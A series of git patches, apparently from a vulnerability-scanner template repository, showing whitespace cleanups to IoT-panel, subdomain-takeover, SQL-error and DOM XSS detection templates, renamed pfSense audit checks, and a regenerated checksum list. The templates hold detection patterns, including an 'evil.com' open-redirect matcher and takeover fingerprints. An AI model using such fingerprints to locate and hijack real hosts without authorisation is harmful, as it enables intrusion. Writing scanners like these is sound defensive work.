b/file/logs/suspicious-sql-error-messages.yaml index 2b287a97e7..9d2a5be300 100644 --- a/file/logs/suspicious-sql-error-messages.yaml +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -39,6 +39,4 @@ file: part: body regex: - 'near \"\*\"\: syntax error' - - 'SELECTs to the left and right of UNION do not have the same number of result columns' - - + - 'SELECTs to the left and right of UNION do not have the same number of result columns' \ No newline at end of file diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index cf311d7290..e100e000a0 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -49,6 +49,4 @@ file: regex: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' - - + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' \ No newline at end of file diff --git a/headless/headless-open-redirect.yaml b/headless/headless-open-redirect.yaml index fd2782eb81..bab0d13ac3 100644 --- a/headless/headless-open-redirect.yaml +++ b/headless/headless-open-redirect.yaml @@ -121,6 +121,4 @@ headless: words: - "evil.com" - "Evil.Com - We get it...Daily." - condition: and - - + condition: and \ No newline at end of file diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index adfee9aaa2..b560cc0e94 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml @@ -91,6 +91,4 @@ headless: - type: kval part: alerts kval: - - alerts - - + - alerts \ No newline at end of file diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index 9314b29f0a..efb9edca21 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -29,6 +29,4 @@ http: words: - "' - - + - '"page" id="login" data\-version="([0-9.]+)">' \ No newline at end of file diff --git a/http/exposed-panels/octoprint-login.yaml b/http/exposed-panels/octoprint-login.yaml index 34364ab148..5b82852801 100644 --- a/http/exposed-panels/octoprint-login.yaml +++ b/http/exposed-panels/octoprint-login.yaml @@ -27,6 +27,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/apc-ups-login.yaml b/http/iot/apc-ups-login.yaml index 6f15c9d1fd..66787b2dcf 100644 --- a/http/iot/apc-ups-login.yaml +++ b/http/iot/apc-ups-login.yaml @@ -28,6 +28,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/contacam.yaml b/http/iot/contacam.yaml index e08c6c22cf..c65155674d 100644 --- a/http/iot/contacam.yaml +++ b/http/iot/contacam.yaml @@ -25,8 +25,7 @@ http: words: - 'ContaCam' part: body + - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/envision-gateway.yaml b/http/iot/envision-gateway.yaml index ea53d33da1..dde4b5c1ae 100644 --- a/http/iot/envision-gateway.yaml +++ b/http/iot/envision-gateway.yaml @@ -28,6 +28,4 @@ http: - 'EnvisionGateway' - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/epmp-login.yaml b/http/iot/epmp-login.yaml index 55159e47c9..19d1054d26 100644 --- a/http/iot/epmp-login.yaml +++ b/http/iot/epmp-login.yaml @@ -29,6 +29,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/heatmiser-wifi-thermostat.yaml b/http/iot/heatmiser-wifi-thermostat.yaml index 3771d3396b..896586624a 100644 --- a/http/iot/heatmiser-wifi-thermostat.yaml +++ b/http/iot/heatmiser-wifi-thermostat.yaml @@ -28,6 +28,4 @@ http: - 'Heatmiser Wifi Thermostat' - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/hp-laserjet-detect.yaml b/http/iot/hp-laserjet-detect.yaml index 589d609abd..eaefa6b3b1 100644 --- a/http/iot/hp-laserjet-detect.yaml +++ b/http/iot/hp-laserjet-detect.yaml @@ -27,6 +27,4 @@ http: part: body - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/internet-service.yaml b/http/iot/internet-service.yaml index 41b5585457..c380c5e770 100644 --- a/http/iot/internet-service.yaml +++ b/http/iot/internet-service.yaml @@ -28,6 +28,4 @@ http: - 'Internet Services' - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/iotawatt-app-exposure.yaml b/http/iot/iotawatt-app-exposure.yaml index b8e474ef40..d7b773efac 100644 --- a/http/iot/iotawatt-app-exposure.yaml +++ b/http/iot/iotawatt-app-exposure.yaml @@ -32,6 +32,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/liveview-axis-camera.yaml b/http/iot/liveview-axis-camera.yaml index 9e8f4f7dd8..455f8eec53 100644 --- a/http/iot/liveview-axis-camera.yaml +++ b/http/iot/liveview-axis-camera.yaml @@ -46,6 +46,4 @@ http: part: body group: 1 regex: - - 'AXIS (.*) Network Camera' - - + - 'AXIS (.*) Network Camera' \ No newline at end of file diff --git a/http/iot/mobotix-guest-camera.yaml b/http/iot/mobotix-guest-camera.yaml index 70f44bc0c0..1132677315 100644 --- a/http/iot/mobotix-guest-camera.yaml +++ b/http/iot/mobotix-guest-camera.yaml @@ -24,8 +24,7 @@ http: - type: word words: - 'MOBOTIX' + - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/netsurveillance-web.yaml b/http/iot/netsurveillance-web.yaml index e8fbf05405..beec23a8eb 100644 --- a/http/iot/netsurveillance-web.yaml +++ b/http/iot/netsurveillance-web.yaml @@ -30,6 +30,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/novus-ip-camera.yaml b/http/iot/novus-ip-camera.yaml index 946bf8b105..af17b93222 100644 --- a/http/iot/novus-ip-camera.yaml +++ b/http/iot/novus-ip-camera.yaml @@ -35,6 +35,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/nuuno-network-login.yaml b/http/iot/nuuno-network-login.yaml index de8972898d..8d740c7278 100644 --- a/http/iot/nuuno-network-login.yaml +++ b/http/iot/nuuno-network-login.yaml @@ -29,6 +29,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/octoprint-3dprinter-detect.yaml b/http/iot/octoprint-3dprinter-detect.yaml index cc605abf0a..2da7c68e95 100644 --- a/http/iot/octoprint-3dprinter-detect.yaml +++ b/http/iot/octoprint-3dprinter-detect.yaml @@ -32,6 +32,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/routeros-login.yaml b/http/iot/routeros-login.yaml index 3619f5e1af..1aa669edf3 100644 --- a/http/iot/routeros-login.yaml +++ b/http/iot/routeros-login.yaml @@ -33,6 +33,4 @@ http: - type: regex group: 1 regex: - - '

    RouterOS v(.+)<\/h1>' - - + - '

    RouterOS v(.+)<\/h1>' \ No newline at end of file diff --git a/http/iot/targa-camera-lfi.yaml b/http/iot/targa-camera-lfi.yaml index 614aaf900f..98b397a020 100644 --- a/http/iot/targa-camera-lfi.yaml +++ b/http/iot/targa-camera-lfi.yaml @@ -29,6 +29,4 @@ http: - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/iot/webcamxp-5.yaml b/http/iot/webcamxp-5.yaml index a06a501fcf..6d38b968eb 100644 --- a/http/iot/webcamxp-5.yaml +++ b/http/iot/webcamxp-5.yaml @@ -28,6 +28,4 @@ http: - 'webcamXP 5' - type: status status: - - 200 - - + - 200 \ No newline at end of file diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index f7f7e67c87..104dd4dd81 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -24,6 +24,4 @@ http: - type: word words: - - Oops.

    The page you're looking for doesn't exist. - - + - Oops.

    The page you're looking for doesn't exist. \ No newline at end of file diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index a6be5a1fd1..fecf6b90ba 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -24,6 +24,4 @@ http: - type: word words: - - Sorry, this page is no longer available. - - + - Sorry, this page is no longer available. \ No newline at end of file diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 4b37e0f516..63a160c4ea 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -24,6 +24,4 @@ http: - type: word words: - - There is no portal here ... sending you back to Aha! - - + - There is no portal here ... sending you back to Aha! \ No newline at end of file From 80e7770e19bf5fe01fbb707db82a8ca5d8bbe821 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 11:57:03 +0530 Subject: [PATCH 409/609] PfSence - changes --- file/audit/pfsense/configure-dns-server.yaml | 4 ++-- file/audit/pfsense/configure-session-timeout.yaml | 4 ++-- file/audit/pfsense/enable-https-protocol.yaml | 4 ++-- file/audit/pfsense/known-default-account.yaml | 4 ++-- file/audit/pfsense/password-protected-consolemenu.yaml | 4 ++-- file/audit/pfsense/set-hostname.yaml | 4 ++-- 6 files changed, 12 insertions(+), 12 deletions(-) diff --git a/file/audit/pfsense/configure-dns-server.yaml b/file/audit/pfsense/configure-dns-server.yaml index 4a31f015c1..ebc2d35d11 100644 --- a/file/audit/pfsense/configure-dns-server.yaml +++ b/file/audit/pfsense/configure-dns-server.yaml @@ -1,11 +1,11 @@ id: configure-dns-server info: - name: DNS Server Configuration - Detect + name: DNS Server Not Implemented - Detect author: pussycat0x severity: info description: | - Netgate DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers. + DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers. reference: | https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html classification: diff --git a/file/audit/pfsense/configure-session-timeout.yaml b/file/audit/pfsense/configure-session-timeout.yaml index f81085eb4e..35a363dbb8 100644 --- a/file/audit/pfsense/configure-session-timeout.yaml +++ b/file/audit/pfsense/configure-session-timeout.yaml @@ -1,11 +1,11 @@ id: configure-session-timeout info: - name: Netgate Configure Sessions Timeout - Detect + name: PfSence Configure Sessions Timeout Not Set - Detect author: pussycat0x severity: info description: | - Netgate configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + Configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: diff --git a/file/audit/pfsense/enable-https-protocol.yaml b/file/audit/pfsense/enable-https-protocol.yaml index 17f69cd09c..48570b546a 100644 --- a/file/audit/pfsense/enable-https-protocol.yaml +++ b/file/audit/pfsense/enable-https-protocol.yaml @@ -1,11 +1,11 @@ id: enable-https-protocol info: - name: Netgate Web Admin Management Portal/HTTPS - Detect + name: Pfsence Web Admin Management Portal HTTPS Not Set - Detect author: pussycat0x severity: info description: | - Netgate Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations. + PfSence Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: diff --git a/file/audit/pfsense/known-default-account.yaml b/file/audit/pfsense/known-default-account.yaml index c545902e59..6cd6ec3485 100644 --- a/file/audit/pfsense/known-default-account.yaml +++ b/file/audit/pfsense/known-default-account.yaml @@ -1,11 +1,11 @@ id: known-default-account info: - name: Netgate Known Default Account - Detect + name: PfSence Known Default Account - Detect author: pussycat0x severity: info description: | - Netgate configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'. + PfSence configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'. reference: | - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html classification: diff --git a/file/audit/pfsense/password-protected-consolemenu.yaml b/file/audit/pfsense/password-protected-consolemenu.yaml index fe17f13eda..d6f0bbcd9b 100644 --- a/file/audit/pfsense/password-protected-consolemenu.yaml +++ b/file/audit/pfsense/password-protected-consolemenu.yaml @@ -1,11 +1,11 @@ id: password-protected-consolemenu info: - name: Netgate Password Protection Configuration - Detect + name: PfSence Consolemenu Password Protection Not Implememnted - Detect author: pussycat0x severity: info description: | - Netgate password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management. + PfSence password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: diff --git a/file/audit/pfsense/set-hostname.yaml b/file/audit/pfsense/set-hostname.yaml index 8d6e35e4cc..88992b1d38 100644 --- a/file/audit/pfsense/set-hostname.yaml +++ b/file/audit/pfsense/set-hostname.yaml @@ -1,11 +1,11 @@ id: set-hostname info: - name: Netgate Hostname - Detect + name: PfSence Hostname Not Set - Detect author: pussycat0x severity: info description: | - Netgate hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device. + PfSence Hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device. reference: | https://docs.netgate.com/pfsense/en/latest/config/general.html classification: From fc81548f8f7c3ae3ccdd2729a86b9b301f6a3e88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 06:31:13 +0000 Subject: [PATCH 411/609] Auto Generated Templates Checksum [Thu Jul 6 06:31:13 UTC 2023] :robot: --- templates-checksum.txt | 498 ++++++++++++++++++++--------------------- 1 file changed, 249 insertions(+), 249 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0a8be95a50..9ff574ab92 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -29,66 +29,66 @@ dns/spoofable-spf-records-ptr.yaml:09283bd4f3b221485e892a4a3f223328013b91aa dns/txt-fingerprint.yaml:f0f06788b607e47008a5893b4c5cb5781deb8122 dns/worksites-detection.yaml:abd1995e754453518918136def84613ab5ec9fd0 file/android/adb-backup-enabled.yaml:a8cfed2c07ecff061bfbc60a61ba20c9d4a08eb2 -file/android/biometric-detect.yaml:390458adc0d25cf76f0f1d533d5c58af9dbd1bc5 -file/android/certificate-validation.yaml:607d9ba229e7868e97a0172c37209b8b234b6625 -file/android/content-scheme.yaml:5d14d3691d2b997beb22d15a10fd7d14ce3d6999 -file/android/debug-enabled.yaml:209dd2b56610e582ce72054f105715064ff78bad -file/android/deep-link-detect.yaml:2e1d0f6e96354202a3a4b0e680c8f08a25a20e73 -file/android/dynamic-broadcast-receiver.yaml:0c138e576e003fd3a9980192920efc9baff35bbe -file/android/file-scheme.yaml:7ec4757b1673378738863a8552c490418ed69cb0 -file/android/provider-path.yaml:900bd65305c4987c88146a5d2d5f00766727e06e -file/android/webview-addjavascript-interface.yaml:5cafbbbefd748999e7b9d31e9eed55a57afc972a -file/android/webview-javascript.yaml:929f48677c680d44c643c486b775acf5e5c39388 -file/android/webview-load-url.yaml:cf892abfaa80f29a70436522f289d5eb3053980f -file/android/webview-universal-access.yaml:96d1dc919754acd27a3f6dc55ed577e47655d611 -file/audit/cisco/configure-aaa-service.yaml:2c2f680c4a4d44558d6d1c2ad35eb9f9213d2502 -file/audit/cisco/configure-service-timestamps-debug.yaml:7aba703293385d31bf8fe2252808ae10954993af -file/audit/cisco/configure-service-timestamps-logmessages.yaml:262cc27d7c132890057f11ff13ec0ded6c5bbff2 -file/audit/cisco/disable-ip-source-route.yaml:1bd9d0eb702eea80d4500b3baf649679d79a4088 -file/audit/cisco/disable-pad-service.yaml:c1d011c1e10bbc3bbba49e71d1c3f38e6fd6cac2 +file/android/biometric-detect.yaml:70f5e2dda35223782c5fbab51b93f620605201b0 +file/android/certificate-validation.yaml:919b1e2709d9fae9e71a5261b1497219aa260881 +file/android/content-scheme.yaml:481102dbb1025bb583f2d9ee96f916185fd5d0f5 +file/android/debug-enabled.yaml:518472860914877fc598385cf4f3d8836c16b457 +file/android/deep-link-detect.yaml:808ab10c2233ee6cc67270919e18b51b8a500eb4 +file/android/dynamic-broadcast-receiver.yaml:f4f29d13dddbc5615318b759bbf1b639443ac36a +file/android/file-scheme.yaml:8993bdc8c849b5c6faef7b332af978392f44db3e +file/android/provider-path.yaml:74b7fac127e2dce07a9649e076f2cc0645243e7c +file/android/webview-addjavascript-interface.yaml:fa71a189ff891fee7a89c42b2e299eadc9e53506 +file/android/webview-javascript.yaml:19141136fced8d0c6ad26499462eeca868073946 +file/android/webview-load-url.yaml:d079431f6b669ae1495e19bc77bd326a97f8ab7e +file/android/webview-universal-access.yaml:d0cbe881984483e24e2388ecc59fefef16d4a6c4 +file/audit/cisco/configure-aaa-service.yaml:5510df6d441d2b5d037267230b40c101182cbcd9 +file/audit/cisco/configure-service-timestamps-debug.yaml:f592167fba234e384d7915a971e1c8ca9649f0dd +file/audit/cisco/configure-service-timestamps-logmessages.yaml:a595a0f40a2bb68069519add4c0ef39c515fca39 +file/audit/cisco/disable-ip-source-route.yaml:1619ea6603c0450025c547c223eb3bfb5d25fa24 +file/audit/cisco/disable-pad-service.yaml:d3bf75b3c11f0d19341961bef8d726c9d3edf80b file/audit/cisco/enable-secret-for-password-user-and-.yaml:8a4d328bec06673eb495e3d3f913b73297e33039 -file/audit/cisco/logging-enable.yaml:22293e0120c00ea85cfed6dadaf23bb9cb772bde -file/audit/cisco/set-and-secure-passwords.yaml:a7d954cd53d85a2f00f83b54870670fff31ff597 -file/audit/fortigate/auto-usb-install.yaml:aa2bb47ad455ea4952c45618ef59a95e9cd81748 -file/audit/fortigate/heuristic-scan.yaml:d7a8b08144e1cf1c4b727f13a58fb7e3583ce512 -file/audit/fortigate/inactivity-timeout.yaml:f0ced8a24861b9f2e56548e7adae1cbb3865f32c -file/audit/fortigate/maintainer-account.yaml:1966d965a5c5b31dcb2750b53291ef7846322dca -file/audit/fortigate/password-policy.yaml:da2042e403ed7d94ddab985dff7263a4de277b23 -file/audit/fortigate/remote-auth-timeout.yaml:39c1813bafa483a217d1483c43f715644824db27 -file/audit/fortigate/scp-admin.yaml:88526bde924d27901dd4a1b9caf8737b1c10a46d +file/audit/cisco/logging-enable.yaml:c6c07574825a5ed0c172c719d4be29150cca7df1 +file/audit/cisco/set-and-secure-passwords.yaml:5c043bc17de07ee587df18881a639270611ca8d3 +file/audit/fortigate/auto-usb-install.yaml:5a8c26dc4d20a9c878dee77b9ea97426948c2993 +file/audit/fortigate/heuristic-scan.yaml:a351227564127f73777a0caec99de5a73fcaa44e +file/audit/fortigate/inactivity-timeout.yaml:aeff30736f7bdb69d09bdb78a65befb9f4c6f457 +file/audit/fortigate/maintainer-account.yaml:6ecc43ea80ccde6cf7305141773d76985cc415f0 +file/audit/fortigate/password-policy.yaml:83a813b2a827086f2994483c22a9d4a5af9a202b +file/audit/fortigate/remote-auth-timeout.yaml:002ab6323dc275f698a30a7fc823cca624d208d6 +file/audit/fortigate/scp-admin.yaml:fffb28e6274646279c3b80135d7052d4ec19f483 file/audit/fortigate/strong-ciphers.yaml:457de07fb1ad41f0eab6c77e2952565a2297db29 -file/audit/pfsense/configure-dns-server.yaml:ad315ef5a9183d8ae18bfaaaffd7e498013c57ff -file/audit/pfsense/configure-session-timeout.yaml:565d5194aee5da814b88a46ed22e62069661a853 -file/audit/pfsense/enable-https-protocol.yaml:fecd2ad4b606b2d94887f6cf754dd9e1301e31e7 -file/audit/pfsense/known-default-account.yaml:de489c19b6fc27f0d0be0ffdbdd06f758690fb0e -file/audit/pfsense/password-protected-consolemenu.yaml:50f13f7da2c1c2ed37a84b42b16887bb978d8826 -file/audit/pfsense/set-hostname.yaml:cf6cb7d196858205bbe4a01ab3169e542c4420cf +file/audit/pfsense/configure-dns-server.yaml:b5ed8e0c10e51fac7f9edf411cbd7b2bf94382f5 +file/audit/pfsense/configure-session-timeout.yaml:fe5784b3be2cca65453a24ce21153530d317b830 +file/audit/pfsense/enable-https-protocol.yaml:46fccfc9914be9c9e76d5d5520c7b032b6c51ff9 +file/audit/pfsense/known-default-account.yaml:8735f5a77ad6ef1cbb63ff191a1849fd357e7bca +file/audit/pfsense/password-protected-consolemenu.yaml:cec0a784fff726550393f83849446fc90523df31 +file/audit/pfsense/set-hostname.yaml:89464979b6b187293fca1d14e694c6d92d513a82 file/bash/bash-scanner.yaml:34c81ff693760add86b161184ca4ef55535d4ba6 -file/electron/electron-version-detect.yaml:8021ce0b863fc7090d0b13a29b97bf8ef1a208b0 +file/electron/electron-version-detect.yaml:48a02ecd612fea69e5463adf12090cac7827cf5f file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7 file/js/js-analyse.yaml:a6147fffd63f593695966ef2bc8c188ecc2be9e8 file/keys/adobe-secret.yaml:356ca5c276c138bdf283fb5ad37c92c334039f9e file/keys/age/age-identity-secret-key.yaml:dfd8a55c73a302cc09e4fd808b0f9e8d95e7a780 file/keys/age/age-recipient-public-key.yaml:a6fe20a97710ae2ee48df1d3607b0b3e2f4c55fa -file/keys/amazon/amazon-account-id.yaml:26ed07b8a94a2c9e96f9e27027c990242f89c6cc -file/keys/amazon/amazon-mws-auth-token.yaml:714c2eafbc61cdae9d451bcb37cb9e04c927770c -file/keys/amazon/amazon-session-token.yaml:8e9ea9d135ce1646b012d8773e44928510ca5890 -file/keys/amazon/amazon-sns-token.yaml:34135d8c2e049f4c6441c339e9444711f0997c36 -file/keys/amazon/aws-access-id.yaml:2e1022a735febe80d44b71837a35a4afad0ca525 -file/keys/amazon/aws-cognito.yaml:7ef8a95dec1248da6ed314cf33dac219f477e45f +file/keys/amazon/amazon-account-id.yaml:0264a3557df595b0a049310c2fff5b487135d2aa +file/keys/amazon/amazon-mws-auth-token.yaml:c2162a91395c784d9a71e2b853a25e870f5f29a6 +file/keys/amazon/amazon-session-token.yaml:465d5705c9c154d4efff90549ee9dc68caedb5d4 +file/keys/amazon/amazon-sns-token.yaml:5b36aa8557573cf1718dbac9d85bc67730eb1a85 +file/keys/amazon/aws-access-id.yaml:5eb3160b1e7a74ea14276003e0a642b6edb42cd6 +file/keys/amazon/aws-cognito.yaml:f4e59d0d3254fb5474f409f0b11c1c1d07fd78f4 file/keys/azure/azure-connection-string.yaml:d58bf3c6083043544a3274141e58741eab46bc5f -file/keys/branch-key.yaml:5378baf1bc66078a1cd36aab840424a14495e149 -file/keys/cloudinary.yaml:f04384e4f360895e73718aae4c580f65b5ebdc32 -file/keys/code-climate-token.yaml:d63800f776299ae4b0b7c9f2a351d6587ec41c8f -file/keys/cratesio-api-key.yaml:23affad7d7e1de4393e4ac401e8b9bf41fabda1d -file/keys/credential-exposure.yaml:d3aab2906aac88559f73e30cbce82493c431c419 -file/keys/credentials.yaml:11f3d4e8623b2dcdeb565bac29ffb113a14b8014 +file/keys/branch-key.yaml:e48b970b6fb7198eb32773851fe531eb766e873b +file/keys/cloudinary.yaml:956631a29959c15ea1fb99bd6334dcb1f27494b1 +file/keys/code-climate-token.yaml:2b888b382164ca42ac80420a1fc638ddbab53d82 +file/keys/cratesio-api-key.yaml:71981c1c4fe11acf046aca9ff98c0f09ef9205dd +file/keys/credential-exposure.yaml:5df648df70ea9bfe15b384ae1acbc57792601c5c +file/keys/credentials.yaml:d16c8afd64d2eedf6e1d4f55d26a8d9a4f0fa32e file/keys/digitalocean/digitalocean-access-token.yaml:43ffca49436dfe11020aee5be7273d42642d0cab file/keys/digitalocean/digitalocean-personal-access.yaml:eacf85f4fd4de677f7a5b58a8ffd107213ae24f8 file/keys/digitalocean/digitalocean-refresh-token.yaml:2a12af9a7ecdb9dbde896582055c4d11b5a6fc50 -file/keys/dynatrace-token.yaml:3052a2375f053a715f8280c30507f70438a66ecd -file/keys/facebook/facebook-client-id.yaml:4020b932d3166489f448a0ad3babcf6f38843339 -file/keys/facebook/facebook-secret.yaml:4920a003ff197e1cc1a409c5c5faf5127fa603d1 +file/keys/dynatrace-token.yaml:0089ac006754be85a40a9be763e66361d6536fcc +file/keys/facebook/facebook-client-id.yaml:8fef6899313ca30722ae3dd8a17a21ee87677e58 +file/keys/facebook/facebook-secret.yaml:8380e6498469237418d6872b69d5027d467c66ae file/keys/facebook/fb-access-token.yaml:4680bd7c7b97d2d6c80684c9443168ae683faf6a file/keys/fcm-api-key.yaml:28c9b101822b4d0d9709482c661fca6993714f02 file/keys/figma-access-token.yaml:bf271c0a3f4cdd5a04ea90b444337fa74598f129 @@ -5344,214 +5344,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb 